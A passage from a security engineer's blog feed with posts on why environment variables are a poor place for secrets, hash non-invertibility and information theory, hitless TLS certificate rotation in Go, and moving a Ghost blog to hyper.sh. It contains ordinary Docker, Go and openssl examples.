<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Why you shouldn't use ENV variables for secret data]]></title><description><![CDATA[If your application requires a password, SSH private key, TLS Certificate, or any other kind of sensitive data, you shouldn't pass it alongside your configs.]]></description><link>https://blog.diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/</link><guid isPermaLink="false">62d8ce7b47f91800018f06dd</guid><category><![CDATA[docker]]></category><category><![CDATA[secrets]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Mon, 27 Mar 2017 16:33:07 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>The <a href="https://12factor.net/config?ref=blog.diogomonica.com">twelve-factor app</a> manifesto recommends that you pass application configs as ENV variables. However, if your application requires a password, SSH private key, TLS Certificate, or any other kind of sensitive data, you shouldn&apos;t pass it alongside your configs.</p>
<img src="https://blog.diogomonica.com/content/images/2017/03/Screenshot-2017-03-27-09.08.29.png" width="700" alt="Fork and getenv example.">
<p>When you store your secret keys in an environment variable, you are prone to accidentally exposing them&#x2014;exactly what we want to avoid. Here are a few reasons why ENV variables are bad for secrets:</p>
<ul>
<li>Given that the environment is implicitly available to the process, it&apos;s hard, if not impossible, to track access and how the contents get exposed (<code>ps -eww &lt;PID&gt;</code>).</li>
<li>It&apos;s common to have applications grab the whole environment and print it out for debugging or error reporting. So many secrets get leaked to PagerDuty that they have a well-greased internal process to scrub them from their infrastructure.</li>
<li>Environment variables are passed down to child processes, which allows for unintended access. This breaks the principle of least privilege. Imagine that as part of your application, you call to a third-party tool to perform some action&#x2014;all of a sudden that third-party tool has access to your environment, and god knows what it will do with it.</li>
<li>When applications crash, it&apos;s common for them to store the environment variables in log-files for later debugging. This means plain-text secrets on disk.</li>
<li>Putting secrets in ENV variables quickly turns into tribal knowledge. New engineers who are not aware of the sensitive nature of specific environment variables will not handle them appropriately/with care (filtering them to sub-processes, etc).</li>
</ul>
<p>Overall, secrets in ENV variables break the principle of least surprise, are a bad practice, and will lead to the eventual leak of secrets.</p>
<h2 id="ifnotenvvariablesthenwhat">If not env variables then what?</h2>
<p>At a previous job I helped solve this problem with a really elegant solution: <a href="https://github.com/square/keywhiz?ref=blog.diogomonica.com">Keywhiz</a>. At Docker we went a step further and built a similar solution directly into Docker itself. If you&apos;re using <a href="https://docs.docker.com/engine/swarm/?ref=blog.diogomonica.com">swarm</a>, you now have a trivial way to manage your secrets securely:</p>
<pre><code class="language-bash">openssl rand -base64 32 | docker secret create secure-secret -
</code></pre>
<p>And that&apos;s it. You can now use your secret:</p>
<pre><code class="language-bash">docker service create --secret=&quot;secure-secret&quot; redis:alpine
</code></pre>
<p>And make your application read the secret contents from the in-memory tmps that gets created under <code>/run/secrets/secure-secret</code>:</p>
<pre><code class="language-bash"># cat /run/secrets/secure-secret
eHwX8kV8sFt/y30WASgz8kimnKhUkCrt07XMrmewYr8=
</code></pre>
<p>By integrating secrets into Docker, we were able to deliver a solution for the secrets management that follows these principles:</p>
<ul>
<li>Secrets are always encrypted, both in transit and at rest.</li>
<li>Secrets are difficult to unintentionally leak when consumed by the final application.</li>
<li>Secrets access adheres to the principle of least-privilege.</li>
</ul>
<p>Having an easy-to-use, secure-by-default secret distribution mechanism is exactly what developers and ops need to solve the secrets management problem once and for all.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Why should *hard* be secure enough? Information and non-invertibility]]></title><description><![CDATA[The guarantees provided by hashes are of critical importance for security. One of the major points of hashes is, of course, their non-invertibility. However...]]></description><link>https://blog.diogomonica.com/2017/02/03/why-should-hard-be-secure-enough-information-and-non-invertibility-2/</link><guid isPermaLink="false">62d8ce7b47f91800018f06de</guid><category><![CDATA[hash]]></category><category><![CDATA[information theory]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Fri, 03 Feb 2017 15:21:16 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>The guarantees provided by hashes are of critical importance for security. One of the major points of hashes is, of course, their non-invertibility. However, even though I know how to do the necessary bitwise rotations and modulus additions to compute <code>[insert favorite hash function here]</code>, I don&#x2019;t always have a clear intuition on how these operations, in this order and with these magic constants, make the original content irrecoverable. I believe that inversion will certainly be very <em>hard</em>, but not necessarily that it will be <em>impossible</em>. I don&apos;t like it when that happens.</p>
<p>Let me tell you what I do like.</p>
<img src="https://blog.diogomonica.com/content/images/2017/02/speed-of-light.png" width="400" alt="Speed of light.">
<p>I like light. Light does not travel at the speed of light (no pun intended) because it is <em>hard</em> for it to do otherwise. No. It travels (and does so at that particular speed), because it is <em>impossible</em> for light to do otherwise. Given the factual existence of the phenomena that humankind so brilliantly summarized in the set of equations known as Maxwell equations, it is simply not possible for light to be still, or even propagate at a different speed in the same medium. See the beauty of this? It is certain. It is sure. It can never change. I can sleep tight and comfortable, because I know that I will never have to cope with a different speed of light in vacuum. No smart order of operations or magic constants, no backdoors, no \(P=NP\) or any other new results in complexity theory will ever make me worry about the speed of light and keep me awake at night. It is not a question of complexity or hardness. It is a question of inevitability. It is impossible for light to do otherwise.</p>
<p>I like it when things are what they are because they simply cannot be something else. I like to feel that some security property relies on impossibility, not on hardness.</p>
<p>The question is: how do we ensure this? The question is easy (the answer not so much) and will bring us to one of the concepts that has made me both happy and sad along the years. Happy, because I love it. Sad, because I can&#x2019;t really understand it.</p>
<img src="https://blog.diogomonica.com/content/images/2017/02/value-of-x-attacker.png" width="550" alt="Information can&apos;t be created out of nothing.">
<p>Let&#x2019;s jump to the end: information; that is my answer. A hash cannot be reversed if we can guarantee that its informational content is not enough to reverse the encoding process. No matter how clever attackers are, they cannot increase the total amount of information available in the pieces we disclose. When we hash a 100-page document into a 128-bit hash, we may be pretty sure that the hash digest does not contain sufficient information to recover the document. Too much information will have been lost in the encoding process. This notion that inverting is impossible because there simply is not enough information to do so is comforting.</p>
<p>On the other hand, sometimes you want your encoding process to preserve some type or amount of information (e.g., topological proximity relations, etc.). In these cases, you will want the encoding to eliminate some of the information (to make the process irreversible), but preserve an established minimum amount (so that the results of the encoding process may still be useful for your particular purposes).</p>
<p>This is all fine and dandy, but implementing this type of approach requires the comprehension of what information is, or at least of how we can acceptably measure it. We have thus arrived at one of my favorite conundrums. Hopefully, by the end of this text, you will be as confused as I am. I will focus only on the &#x201C;easy&#x201D; end: What does it mean to say that the disclosed data has no information at all? Reporting back to the example of the previous figure, I think we all agree that saying &#x201C;All values of \(x\) are equiprobable&#x201D; conveys zero information in what concerns the particular value assumed by \(x\). This means that a uniform distribution of probability, where all values are equiprobable, is the epitome of the notion of &#x201C;zero information&#x201D; about the particular value of \(x\).</p>
<p><img src="https://blog.diogomonica.com/content/images/2017/02/Probability-of-x.png" width="500" alt="Uniform distribution. Given that all values of x are equiprobable, uniform distributions seem to carry no information whatsoever concerning the value of x.
"></p>
<p>This makes sense, right? Let us then freeze the thought, for the moment.</p>
<blockquote>
<p>Having zero information means that everything is possible and equiprobable. If we knew that something was more probable than something else, that would be knowing something; it would imply having some information.</p>
</blockquote>
<p>Good. We seem to be moving forward. Let us continue by agreeing that, if we have zero information concerning the value of \(x\), than we are also clueless in what concerns the value of, say, \(x^2\). Which means that, as far as we know, \(x^2\) can also be anything, with equal probability; that is, that the probability distribution of \(x^2\) must also be uniform. This is great. We are already applying the previous conclusion to infer new facts.</p>
<p>Unfortunately, our conclusion must be wrong. If \(x\) has a uniform distribution, \(x^2\) cannot also have a uniform distribution. It is simply impossible. No can do. If your math is all but gone, you may just want to trust me on this, and skip the &#x201C;math box&#x201D; proving the assertion I am about to make: If the probability distribution of \(x\) is uniform, the probability that \(x^2\) is, for example, between 0 and 1, is approximately three times higher than the probability that \(x^2\) is between 2 and 3.</p>
<hr>
<h4 id="mathbox">Math Box</h4>
<p>Suppose that the uniform probability density distribution of \(x\) has value \(k\) (the value of \(k\) depends on the distribution support, of course, but this is unimportant for our objective here). To confirm the notion that this uniform distribution provides no information concerning the value of \(x\), let us for example compute the probability that \(x\) is in the range \([\tau, \tau + \mu]\). This is trivially done by:</p>
<p>\begin{equation}<br>
P(\tau &lt; x \leq \tau + \mu)=\int_{\tau}^{\tau + \mu} k \hspace{2mm} dx = k (\tau+\mu-\tau)=\mu k<br>
\end{equation}</p>
<p>The result does not depend on \(\tau\), which confirms that the probability of finding \(x\) in an interval of length \(\mu\) is always the same, no matter where that interval is located. That is: the probability of finding \(x\) in the interval \([0,1]\) is the same of finding \(x\) in the interval \([2, 3]\). This comes to confirm that we have no idea where \(x\) is; no information about its value.</p>
<p>Let us now repeat the procedure, but this time for \(x^2\). The probability that \(x^2\) is in the range \([\tau , \tau + \mu]\) is now given by</p>
<p>\begin{equation}<br>
P(\tau &lt; x^2 \leq \tau + \mu)=\int_{-\sqrt{\tau + \mu}}^{-\sqrt{\tau}} k \hspace{2mm} dx + \int_{\sqrt{\tau}}^{\sqrt{\tau+ \mu}} k \hspace{2mm} dx = 2 k (\sqrt{\tau+ \mu}-\sqrt{\tau})<br>
\end{equation}</p>
<p>The result now depends on \(\tau\). This means that the probability of finding \(x^2\) in an interval of length depends on where that interval is located. As an example, the probability of finding \(x^2\) in the interval \([0,1]\) is \(2k (\sqrt{0+1}-\sqrt{0})=2k\), but the probability of finding it in the interval  \([2, 3]\) is now \(2k (\sqrt{2+1}-\sqrt{2})=0.63575 k\) (approximately three times lower than that of finding it in the interval \([0,1]\)).</p>
<hr>
<p>That is: by knowing nothing about \(x\), we will know something about \(x^2\); namely, that it is approximately three times more probable to find \(x^2\) between 0 and 1 than it is to find it between 2 and 3. How can this be? Had we not agreed that, if we have no information about \(x\), then it stands to reason that we also cannot know anything about \(x^2\)? Hmmm&#x2026; Let&#x2019;s recap.</p>
<blockquote>
<p>If we know nothing about the value of \(x\), logic dictates that we should know nothing about the value of \(x^2\). However, the mere fact that we know nothing about \(x\) (and that all values of \(x\) are therefore equally probable from our ignorant point of view), implies that we know something about \(x^2\); for example, that \(x^2\) is approximately three times more likely to be found between 0 and 1 than between 2 and 3. This contradicts the logic conclusion that started the paragraph.</p>
</blockquote>
<img src="https://blog.diogomonica.com/content/images/2017/02/something-is-rotten.png" width="500" alt="Shakespeare dixit.">
<p>As Shakespeare put it, something is rotten in the state of Denmark. My only hope is that you are now as confused as I am. And if you&#x2019;re thinking that the answer to the problems with the concept of information lies somewhere in Shannon&#x2019;s definition of information, think again. Let us just say that, for example, if we use Shannon&#x2019;s definition of information, a book with random characters is much, much more informative than any book written in English (or in any other human language, for that matter). For the even more refined readers, who are thinking about eventually less known definitions of information, and are therefore mentally fencing words such as R&#xE9;nyi, Kullback, Leibler, Fisher, and other names of semi-Gods, I say: been there, done that; still confused.</p>
<p>Let me now wrap this up by saying that the problem we just saw is not new. Not by a long shot. In fact, we have just stumbled on the well known (and hitherto unsolved in a general way) problem of defining non-informative priors in Bayesian statistics. Many brilliant and powerful statisticians have attempted to solve this problem, and obtained ways of untangling this&#x2026; this... (shall we call it a paradox?) in particular instances, from particular points of view. Jeffreys comes of course to mind, but there&#x2019;s Jaynes, Jos&#xE9;-Miguel Bernardo, and so many other super-heroes. Rumour even has it that solving this paradox might be the main plot of the next Batman movie.</p>
<img src="https://blog.diogomonica.com/content/images/2017/02/batman.png" width="500" alt="Batman!">
<p>A final note. If you are trying to pin the blame on the uniform distribution, please know that the same type of game can be played with any distribution that you feel may represent the concept of &#x201C;zero information.&#x201D; I only used the uniform, because it is the one that makes the most sense when we first think about the problem. Or, if you&#x2019;re into more formal reasoning, because it embodies Bernoulli&#x2019;s principle of insufficient reason (which basically states that we should assume that all possibilities have equal probability if we have no information that tells us otherwise).</p>
<p>As soon as I get to the bottom of this and have a final coherent answer, I will make a new post and tell you the solution. Should the fact that the above-mentioned super-humans didn&#x2019;t get to a global solution discourage me? Maybe. I only hope that the Sun doesn&#x2019;t go all white-dwarf on me before I get to a definitive solution. What? Only 5 billion years left? That might be cutting it a bit short.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Hitless TLS Certificate Rotation in Go]]></title><description><![CDATA[Hitless TLS certificate rotation is critical to continue our quest of reducing certificate expiration times, while keeping our sanity intact.]]></description><link>https://blog.diogomonica.com/2017/01/11/hitless-tls-certificate-rotation-in-go/</link><guid isPermaLink="false">62d8ce7b47f91800018f06db</guid><category><![CDATA[docker]]></category><category><![CDATA[tls]]></category><category><![CDATA[golang]]></category><category><![CDATA[swarm]]></category><category><![CDATA[rotation]]></category><category><![CDATA[MTLS]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Wed, 11 Jan 2017 16:37:11 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>One of the core security goals of Docker&apos;s <a href="https://docs.docker.com/engine/swarm/?ref=blog.diogomonica.com">Swarm mode</a> is to be secure by default. To achieve that, when <a href="https://docs.docker.com/engine/reference/commandline/swarm_init/?ref=blog.diogomonica.com">a new Swarm gets created</a> it generates a self-signed Certificate Authority (CA) and issues short-lived<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> certificates to every node, allowing the use of <a href="https://en.wikipedia.org/wiki/Mutual_authentication?ref=blog.diogomonica.com">Mutually Authenticated TLS</a> for node-to-node communications.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/swarm-with-mutual-tls-simple.png" width="300" alt="Mutual TLS between Swarm nodes.">
<p>Unfortunately, and much to the annoyance of every infrastructure engineer, there is an old TLS maxim that states that:</p>
<blockquote>
<p>If a certificate got issued, it will have to be rotated.</p>
</blockquote>
<p>Rotating TLS certificates manually may quickly get out of hand&#x2014;particularly when we have to manage hundreds of certificates&#x2014;and becomes completely unmanageable if we issue certificates that expire within hours, instead of months.</p>
<p>In this post I&apos;ll go over two different ways of doing hitless certificate rotation in Go, so that we can follow the only logical path out of this certificate management nightmare: automate the hell out of TLS certificate rotation.</p>
<h3 id="whydoineedhitlessrotation">Why do I need hitless rotation?</h3>
<p>There are some use-cases where replacing the TLS certificate on disk and restarting the application is a completely valid way of doing certificate rotation.</p>
<p>In fact, if we do a rolling deploy of our application&#x2014;by adding new application instances with the new certificate before shutting down the instances with the old certificate&#x2014;we can achieve hitless rotation<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup> and none of the incoming requests to the application will be dropped.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/load-balancer-hitless-rotation-1.png" width="400" alt="Rotation between App versions A and B, using a Load Balancer.">
<p>Unfortunately, there are two main issues with this approach:</p>
<ul>
<li>There might be side-effects to shutting down the old instances (e.g., applications losing their caches).</li>
<li>We either have to wait for all the currently active TCP connections of our old instances to finish (i.e., we might have to wait a long time) or forcefully terminate all the current open connections.</li>
</ul>
<p>As a concrete example, consider the Docker Swarm architecture, depicted in the following Figure. To create highly-available clusters, Swarm uses special manager nodes participating in a consensus protocol called Raft. Manager nodes keep long-lived connections between each other, and all the other nodes in the system (workers) maintain a long-lived connection to one of the managers.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/swarm-raft-cluster-1.png" width="400" alt="Swarm Architecture.">
<p>If we were to use the previously described rolling&#x2013;deploy method to rotate the certificates on the manager nodes, we would:</p>
<ul>
<li>Cause a thundering herd of workers attempting to reconnect their terminated connections with the managers.</li>
<li>Potentially cause a leader election between the managers, bringing unnecessary disruption to our cluster while Raft converges to a new leader.</li>
</ul>
<p>To make matters worse, if our certificates have short expiration times, these two issues would occur several times a day.</p>
<p>Fortunately, there is a better way.</p>
<h3 id="certificateselectionduringthetlshandshake">Certificate selection during the TLS handshake</h3>
<p>In a TLS handshake, the certificate presented by a remote server is sent alongside the <code>ServerHello</code> message. At this point in the connection, the remote server has received the <code>ClientHello</code> message, and that is all the information it needs to decide which certificate to present to the connecting client.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/begining-tls-handshake-1.png" width="300" alt="Beginning of TLS handshake">
<p>It turns out that Go supports passing a callback in a TLS Config that will get executed every time a TLS <code>ClientHello</code> is sent by a remote peer. This method is conveniently called <code>GetCertificate</code>, and it returns the certificate we wish to use for that particular TLS handshake.</p>
<p>The idea of <code>GetCertificate</code> is to allow the dynamic selection of which certificate to provide to a particular remote peer. This method can be used to support virtual hosts, where one web server is responsible for multiple domains, and therefore has to choose the appropriate certificate to return to each remote peer.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/certificate-selection-during-handshake-1.png" width="400" alt="Certificate Selection during handshake">
<p>Using <code>GetCertificate</code> is easy. The first thing we need to do is to create a <code>struct</code> that implements the <code>GetCertificate(clientHello *tls.ClientHelloInfo)</code> method<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup>.</p>
<pre><code class="language-golang">type wrappedCertificate struct {
	sync.Mutex
	certificate *tls.Certificate
}

func (c *wrappedCertificate) getCertificate(clientHello *tls.ClientHelloInfo) (*tls.Certificate, error) {
	c.Lock()
	defer c.Unlock()

	return c.certificate, nil
}
</code></pre>
<p>After this, we can create a TLS Config that makes use of this method, and a TLS listener that makes use of this config:</p>
<pre><code class="language-golang">wrappedCert := &amp;wrappedCertificate{}
config := &amp;tls.Config{
	GetCertificate: wrappedCert.getCertificate,
	PreferServerCipherSuites: true,
	MinVersion:               tls.VersionTLS12,
}
network := &quot;0.0.0.0:8080&quot;
listener, _ := tls.Listen(&quot;tcp&quot;, network, config)
</code></pre>
<p>Every time a TLS handshake is about to occur, our <code>getCertificate</code> method is going to get called, and the current certificate stored inside <code>wrappedCertificate</code> will be returned.</p>
<p>However, we are missing a way of replacing the internal certificate that is returned by <code>getCertificate</code>. Let&apos;s fix that:</p>
<pre><code class="language-golang">func (c *wrappedCertificate) loadCertificate(cert, key []byte) error {
	c.Lock()
	defer c.Unlock()

	certAndKey, err := tls.X509KeyPair(cert, key)
	if err != nil {
		return err
	}

	c.certificate = &amp;certAndKey

	return nil
}
</code></pre>
<p>This <code>loadCertificate()</code> method allows updating the certificate stored inside <code>wrappedCertificate</code>, successfully achieving our goal of doing certificate rotation without killing the currently active connections.</p>
<p>Here&apos;s a diagram of what is happening:</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/golang-new-certificate-being-served.png" width="300" alt="Golang application changes the certificate currently being served.">
<p>Old established connections using the previous certificate will remain active, but new connections coming in to our TLS server will use the most recent certificate.</p>
<p>Here is a <a href="https://github.com/diogomonica/certificate-rotation/blob/master/certificate_rotation.go?ref=blog.diogomonica.com">simple example</a> of a TLS server that rotates its certificates every second. Every new certificate gets generated with random Organization (<code>O=</code>); running this example and doing a few handshakes shows us that the server is indeed rotating certificates at every second:</p>
<pre><code class="language-terminal">&#x279C; go build certificate_rotation.go; ./certificate_rotation
Generating new certificates.
Generating new certificates.
</code></pre>
<pre><code class="language-terminal">&#x279C;  ~ openssl s_client -connect localhost:8080 -no_ssl3 -no_ssl2 | openssl x509 -text | grep &quot;O=&quot;
depth=0 /O=YSvkxjrK1UGexUg1KubNtrfXRhyRF-AxPPtXZxXkiKk=
...
&#x279C;  ~ openssl s_client -connect localhost:8080 -no_ssl3 -no_ssl2 | openssl x509 -text | grep &quot;O=&quot;
depth=0 /O=aQIkDOpBwUDLdCLAGvnY8C5vRlmV0eDn2hRf_zTgpxk=
...
</code></pre>
<p>For a more complex use of <code>GetCertificate</code> take a look at the autocert package in <a href="https://github.com/golang/crypto/blob/master/acme/autocert/autocert.go?ref=blog.diogomonica.com"><code>golang.org/x/crypto/acme/autocert</code></a>, which does domain-based lookups on a memory cache hosting all the currently available certificates.</p>
<h3 id="choosingthetlsconfigbeforethetlshandshake">Choosing the TLS config before the TLS handshake</h3>
<p>There is another way of achieving the same goal of certificate rotation in Go. Instead of relying on <code>GetCertificate</code>to be called on every TLS handshake and choosing which certificate gets used, we can create a new TLS server for every accepted TCP connection, and provide whatever TLS config is active at the time.</p>
<p>The major advantage of this particular route is the fact that we are no longer stuck with the same TLS config parameters for every connection, and we can change any TLS Config parameters on the fly.</p>
<p>To do this, we create a <code>wrappedConfig struct</code>, instead of a <code>wrappedCertificate struct</code>:</p>
<pre><code class="language-golang">type wrappedConfig struct {
	sync.Mutex
	config *tls.Config
}

func (c *wrappedConfig) getConfig() *tls.Config {
	c.Lock()
	defer c.Unlock()

	return c.config
}
</code></pre>
<p>The major difference from the previous method lies in not using a <code>tls.Listener</code>, and instead manually creating a <code>tls.Server</code> with the desired TLS config on every <code>net.Listener.Accept()</code>.</p>
<pre><code class="language-golang">
	wrappedConfig := &amp;wrappedConfig{}
	network := &quot;0.0.0.0:8080&quot;
	listener, _ := net.Listen(&quot;tcp&quot;, network)
...
	conn, _ := listener.Accept()
	config := wrappedConfig.getConfig()
	conn = tls.Server(conn, config)
</code></pre>
<p>Why is this useful? In the previous solution we were only able to control which certificate was returned. This method now allows us to switch any parameter inside the config, enabling use-cases such as root CA rotation or dynamic selection of cipher suites.</p>
<p>Here is a <a href="https://github.com/diogomonica/certificate-rotation/blob/master/config_rotation.go?ref=blog.diogomonica.com">silly example</a> to show config rotations.</p>
<p>We have a <a href="https://github.com/diogomonica/certificate-rotation/blob/master/config_rotation.go?ref=blog.diogomonica.com">simple server</a> that rotates it&apos;s own TLS Config every second,  not only renewing its certificate, but also switching between supporting TLS 1.2 only, or supporting anything above SSL3.0. On the client side, we will have a client that will only attempt to use TLS 1.0. Let&apos;s see what happens:</p>
<pre><code class="language-terminal">&#x279C; openssl s_client -connect localhost:8080 -tls1
CONNECTED(00000003)
depth=0 /O=lJfunYUG8zk8c8Q9JeYALONSgHpUkPIdkwoBXU2bqfU=
...
&#x279C; openssl s_client -connect localhost:8080 -tls1
CONNECTED(00000003)
17760:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:/BuildRoot/Library/Caches/com.apple.xbs/Sources/OpenSSL098/OpenSSL098-64/src/ssl/s3_pkt.c:566:
&#x279C;  openssl s_client -connect localhost:8080 -tls1
CONNECTED(00000003)
depth=0 /O=Df0ksueEUr6-ka5Vz9HH8LILPA_Webim4kBa3rMroLM=
...
</code></pre>
<p>As expected, the first <code>s_connect</code> succeeds, the second one fails, and the third one again succeeds. The server will continue flipping the minimum allowed TLS version back and forth, and the client will continue  to alternate between successfully creating a TLS 1.0 connection, and being rejected for not supporting TLS 1.2.</p>
<h3 id="certificaterotationindockerswarm">Certificate rotation in Docker Swarm</h3>
<p>One of our objectives with Docker Swarm is to support transparent root rotation. The idea is to allow an administrator to force the whole cluster to migrate away from an old root CA transparently, removing its existence from the trust stores of all the nodes participating in the Swarm. This means that we need control over the whole TLS config, instead of controlling only which certificate is currently being served.</p>
<p>To slightly complicate matters, we have to rotate not only the server certificates, but also the client certificates being actively used for <a href="https://en.wikipedia.org/wiki/Mutual_authentication?ref=blog.diogomonica.com">Mutually Authenticated TLS</a> by every node.</p>
<p>Finally, Swarm also makes heavy use of <a href="http://www.grpc.io/?ref=blog.diogomonica.com">gRPC</a>, which is a a high-performance, open-source, universal RPC framework. Therefore, we will have to integrate our <code>wrappedConfig</code> style config rotation with the gRPC&apos;s authentication model.</p>
<p>It turns out that gRPC provides a simple authentication API that allows us to define custom methods for performing the client and server handshakes by simply implementing the  <a href="https://github.com/grpc/grpc-go/blob/master/credentials/credentials.go?ref=blog.diogomonica.com#L100">TransportCredentials</a> interface:</p>
<pre><code class="language-golang">type TransportCredentials interface {
	ClientHandshake(context.Context, string, net.Conn) (net.Conn, AuthInfo, error)
	ServerHandshake(net.Conn) (net.Conn, AuthInfo, error)
	Info() ProtocolInfo
	Clone() TransportCredentials
	OverrideServerName(string) error
}
</code></pre>
<p>We chose to create a <a href="https://github.com/docker/swarmkit/blob/master/ca/transport.go?ref=blog.diogomonica.com">MutableTLSCreds</a> struct, which implements this <a href="https://godoc.org/google.golang.org/grpc/credentials?ref=blog.diogomonica.com">TransportCredentials</a> interface and allows the caller to simply change the TLS Config by calling <code>LoadNewTLSConfig</code>.</p>
<pre><code class="language-golang">// MutableTLSCreds is the credentials required for authenticating a connection using TLS.
type MutableTLSCreds struct {
	// Mutex for the tls config
	sync.Mutex
	// TLS configuration
	config *tls.Config
	// TLS Credentials
	tlsCreds credentials.TransportCredentials
	// store the subject for easy access
	subject pkix.Name
}
</code></pre>
<p>Note that we had to implement both <code>ClientHandshake</code> and <code>ServerHandshake</code> to support transparent rotation of both server and client connections. You can find the full implementation <a href="https://github.com/docker/swarmkit/blob/master/ca/transport.go?ref=blog.diogomonica.com">here</a>.</p>
<h3 id="changescomingingolang18">Changes coming in Golang 1.8</h3>
<p>If the previous method seems a bit clunky to you, it&apos;s because it is. Thankfully, <a href="https://blog.gopheracademy.com/advent-2016/go-1.8/?ref=blog.diogomonica.com">Golang 1.8</a> is bringing some changes that will help simplify this use-case. In particular, the addition of <a href="https://tip.golang.org/pkg/crypto/tls/?ref=blog.diogomonica.com#Config.GetConfigForClient">GetConfigForClient</a> will allow us to dynamically change the server&apos;s TLS Config behavior based on the <code>ClientHello</code> message.</p>
<p>Additionally, Golang 1.8 is also adding support for ChaCha20-Poly1305 based cipher suites and the <code>VerifyPeerCertificate</code> method, which enables custom certificate checking logic.</p>
<h3 id="conclusion">Conclusion</h3>
<p>The ability of doing hitless TLS certificate rotation is critical to continue our quest of reducing certificate expiration times, while keeping our sanity intact.</p>
<p>Hopefully, at this point you&apos;ll agree with me that Golang makes it incredibly easy to support hitless TLS certificate rotation in your applications, so go forth and <em>rotate all the keys</em>.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>The default expiration time is three months, but can be brought all the way down to one hour. <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
<li id="fn2" class="footnote-item"><p>Assuming that we wait for all the connections from old instances to terminate. <a href="#fnref2" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
<li id="fn3" class="footnote-item"><p>I chose to use a Mutex for readability. Technically, we could have made the code shorter by using atomic.LoadPointer() instead. <a href="#fnref3" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Build once run where? Migrating my blog to hyper.sh]]></title><description><![CDATA[Docker's motto is build once, run everywhere. I put that to the test by migrating my containerized blog to a new Docker hosting platform called Hyper.sh.]]></description><link>https://blog.diogomonica.com/2016/12/03/build-once-run-where-migrating-my-blog-to-hyper-sh/</link><guid isPermaLink="false">62d8ce7b47f91800018f06dc</guid><category><![CDATA[docker]]></category><category><![CDATA[hypersh]]></category><category><![CDATA[ghost]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sat, 03 Dec 2016 17:59:49 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>A few months ago, I ran into a cool new product called <a href="https://console.hyper.sh/register/invite/Rnw0bmKER7TqrxE2owaGuWNk5Jjp4zU8?ref=blog.diogomonica.com">hyper.sh</a>, a Docker container hosting platform. The goal of hyper.sh is to make it easier to deploy your containerized applications to the cloud by replicating the Docker command-line experience.</p>
<p><a href="https://console.hyper.sh/register/invite/Rnw0bmKER7TqrxE2owaGuWNk5Jjp4zU8?ref=blog.diogomonica.com"><img src="https://blog.diogomonica.com/content/images/2016/12/Screenshot-2016-12-02-17.09.22.png" alt="http://hyper.sh" loading="lazy"></a></p>
<p>Since I&apos;m already running this blog inside of a container and the promise of Docker is to build once, run everywhere, I wanted to see how easy and how much cheaper it would be to migrate from a $5 <a href="https://m.do.co/c/7e737c9c7d00?ref=blog.diogomonica.com">Digital Ocean</a> instance to hyper.sh.</p>
<h2 id="currentsetup">Current Setup</h2>
<p>I&apos;m running my Ghost blog on a Ubuntu 16.04 $5 <a href="https://m.do.co/c/7e737c9c7d00?ref=blog.diogomonica.com">Digital Ocean</a>  droplet.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/12/Screenshot-2016-12-02-17.26.59-1.png" alt loading="lazy"></p>
<p>I use a local directory (<code>/var/www/ghost</code>) to keep my persistent data, and use the <a href="https://hub.docker.com/_/ghost/?ref=blog.diogomonica.com">official ghost</a> image directly, passing in <code>NODE_ENV=production</code> and forwarding port <code>80</code> to the internal port <code>2368</code>.</p>
<pre><code class="language-terminal">&#x279C;  ~ docker run -d --name ghost-blog -v /var/www/ghost:/var/lib/ghost \
--restart always -e &quot;NODE_ENV=production&quot; \
-p 2368:2368 ghost
</code></pre>
<h2 id="migratingtohypersh">Migrating to Hyper.sh</h2>
<p>The migration to hyper.sh was surprisingly straightforward.</p>
<ul>
<li><a href="https://console.hyper.sh/register/invite/Rnw0bmKER7TqrxE2owaGuWNk5Jjp4zU8?ref=blog.diogomonica.com">Create an account</a>.</li>
<li><a href="https://docs.hyper.sh/GettingStarted/generate_api_credential.html?ref=blog.diogomonica.com">Generate credentials</a> on the web UI.</li>
<li>Install <code>hyper</code> by doing <code>brew install hyper</code>.</li>
<li>Configure <code>hyper</code> by running <code>hyper config</code> command and provide the API credentials.</li>
</ul>
<p>At this point we have a working hyper.sh installation, and we&apos;re ready to run any container.</p>
<pre><code class="language-terminal">&#x279C;  hyper run -it alpine sh
Unable to find image &apos;alpine:latest&apos; in the current region
latest: Pulling from library/alpine

3690ec4760f9: Pull complete
Digest: sha256:1354db23ff5478120c980eca1611a51c9f2b88b61f24283ee8200bf9a54f2e5c
Status: Downloaded newer image for alpine:latest

/ #
</code></pre>
<p>The next step was to migrate my current Ghost data. This turned out to also be surprisingly easy since hyper.sh supports <a href="https://docs.hyper.sh/Feature/storage/volume.html?ref=blog.diogomonica.com">uploading local files</a> when creating a new volume on run.</p>
